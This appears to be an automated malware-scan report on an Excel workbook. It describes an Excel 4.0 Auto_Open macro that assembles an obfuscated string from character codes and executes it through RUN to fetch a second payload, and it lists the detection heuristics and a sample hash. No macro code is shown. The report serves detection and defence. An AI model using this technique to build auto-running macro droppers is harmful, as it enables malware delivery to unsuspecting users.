MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous formula APIs like RUN. The macro attempts to construct a complex string using character code manipulation and then execute it, which is a common technique for downloading and executing a secondary payload. The specific string constructed by the macro is included as an IOC.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129108 bytes |

SHA-256: a11ebd3760f1fb3374f2ac38a2bfb6c740adc664470132d4d9bf7702f4c7c8f3
Preview script: first 1,000 lines of the extracted script